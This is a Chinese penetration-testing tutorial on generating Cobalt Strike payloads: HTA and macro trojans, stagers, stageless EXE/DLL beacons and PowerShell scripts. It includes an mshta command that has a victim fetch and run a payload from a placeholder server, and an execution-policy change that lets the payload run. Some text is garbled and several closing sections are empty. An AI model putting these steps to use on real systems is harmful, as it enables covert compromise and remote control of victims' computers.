本文作者：BlackCat（Ms08067内网安全小组成员）

步骤：Attacks—〉Packages—〉如下:

1. HTML Application 生成恶意的HTA木马文件

2. MS Office Macro 生成office宏病毒文件

3. Payload Gene rator 生成各种语言版本的payload;

4. Windows Executable 生成可执行exe木马；

5. Windows Executable⑸ 生成无状态的可执行exe木马。
   

1.HTML Application

生成恶意的HTA木马文件

• —个HTML Application （HTML应用）是一个使用HTML和一个Internet浏览器支持的脚本语言编写的Windows程序。该程序包生成一个HTML应用，该应用运行一个CobaltSt rikepayload。你可以选择可执行的选项来获取一个HTML应用，此HTML应用使得一个可执行文件落地在磁盘上并运行它。

选择PowerShell选项来得到一个HTML应用

• 该应用使用PowerShell来运行一个payload。使用VBA选项来静默派生一个MicrosoftExcel实例并运行一个恶意的宏来将payload注入到内存中。

生成一个 HTML application

• Attacks -> Packages -> Html Application

这里有三种工作方式

• executable（生成可执行攻击脚本）

• powershell（生成一个powershell的脚本）

• VBA（生成一个vba的脚本，使用mshta命令执行）

这里借鉴一个网上的 *** ，生成一个powershell,因为i两外两种方式上线不成功，然后配合host file使用。

然后会生成一个URL复制到

http://x.x.x.x:8008/download/file.ext

然后在受害者机器上运行

mshta http://x.x.x.x:8008/download/file.ext

然后CS端就可以收到上线了

2. MS Office Macro

该程序包生成一个MicrosoftOffice的宏文件并提供将宏嵌入Microsoft Word或Microsoft Excel的说明。这个参考我钓鱼部分的宏文件 *** 部分的文章。

3.payload Generator

该程序包允许你以不同的多种格式导出Cobalt Strike的stager。

运行 Attacks -> packages --> payload generator

该模块可以生成n种语言的后门Payload,包括C,C#,Python,Java,Perl,Powershell脚本，Powershell命 令，Ruby,Raw,免杀框架Veli中的shellcode等等…

渗透Windows主机过程中，用的比较多的就是Powershell和Powershell Command,主要是因为其方便 易用，且可以逃避一下杀毒软件（AV）的查杀。

以Powe rshell Command为例，生成的payload为一串命令，只要在主机上执行这一串命令（主机需安 装Powe rshell）, cs即可收到主机的beacon

4.Windows Executable (Windows 可执行文件)

该程序包生成一个Windows可执行Ar tifact，用于传送一个payload stage r。这个程序包为你提供了多种输出选项。

Windows Serv ice EXE 是一个 Windows 可执行文件，可响应Service Cont rol Manage r命令。你可以使用这个可执行文件来作为使用sc命令起的Windows服务的调用程序，或使用Metasploit框架的PsExec模块生成一个自定义的可执行文件。

也就是说，普通的EXE和服务器启动调用的EXE是有区别是。利用Windows ServiceEXE生成的EXE才能用来作为服务自启动的EXE,利用Cobalt Strike中Windows exe生成的EXE不能作为服 务自启动的EXE程序(因为不能响应Service Control Manager)

Windows DLL (32-bit)是一个 x86 的 Windows DLL。

Windows DLL (64-bit)是一个x64的Windows DLL。这个DLL会派生一个32位的进程，并且将你的监听器迁移至其上。这两个DLL选项都会导出一个开始功能，此功能与rundll32 .exe相兼容。使用rundll32 .exe来从命令行加载你的DLL。勾选Use x64 payload框来生成匹配x64 stager的x64Ar tifact。勾选Sign executable file框来使用一个代码签名的证书来签名一个EXE或DLL Ar tifact。你 必须指定一个证书，你必须在C2拓展文件中指定证书。

上面说了好多但是实践非常简单，只是需要确认下受害者的电脑是X64还是X32直接运行我们生成的exe文件

5.Windows Executable(s)

该程序包直接导出Beacon (也就是payload stage)，这个Beacon是作者写好的32或64位DLL，是一个不使用stager的可执行文件，直接和监听器连接、传输数据和命令。一个不使用stager的payload Ar tifact被称为无阶段的Ar tifact。这个程序包也有Powe rShell选项来导出Beacon作为一个PowerShell脚本，或raw选项导出与位置无关的beacon代码。

默认情况下，这个对话导出x86 payload stage。勾选Use x64 payload框来使用x64 Ar tifact生成一个x64 stage。勾选Sign executable file框来使用代码签名的证书来签名一个EXE或DLL Artifact。

这里尝试生成一个powershell马

但是生成后直接运行不可行

这里要更改下他的策略

只有管理员才有权限更改这个策略。非管理员会报错。查看脚本执行策略，可以通过：

PS E:> Get-ExecutionPolicy

更改脚本执行策略，可以通过

PS E:> Get-ExecutionPolicyRestrictedPS E:> Set-ExecutionPolicy UnRestricted

然后再次执行：

CS4.0上线机器后操作
右键菜单:

一、Interact
进入操作命令

二、Access

三、Explore

四、Pivoting

五、Spawn
外部监听器（如指派给MSF,获取meterpreter权限）

六、Session

interact打开beacon后执行的操作:

MS08067实验室官网：www.ms08067.com

公众号：" Ms08067安全实验室"

Ms08067安全实验室目前开放知识星球： WEB安全攻防，内网安全攻防，Python安全攻防，KALI Linux安全攻防，二进制逆向入门

最后期待各位小伙伴的加入！